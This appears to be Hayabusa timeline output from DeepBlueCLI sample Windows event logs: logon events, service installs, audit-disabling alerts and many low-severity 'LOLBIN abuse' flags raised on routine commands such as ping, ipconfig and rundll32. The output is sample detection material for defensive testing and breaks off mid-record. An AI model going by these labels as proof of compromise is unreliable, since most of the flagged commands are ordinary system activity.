2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 
0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: 
